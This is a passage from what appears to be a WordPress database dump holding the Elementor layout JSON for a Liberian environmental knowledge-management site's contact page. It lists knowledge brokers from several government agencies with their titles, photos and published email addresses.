:33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24765,3672,'_elementor_edit_mode','builder'),(24766,3672,'_elementor_template_type','wp-page'),(24767,3672,'_elementor_version','3.0.16'),(24768,3672,'_wp_page_template','default'),(24769,3672,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\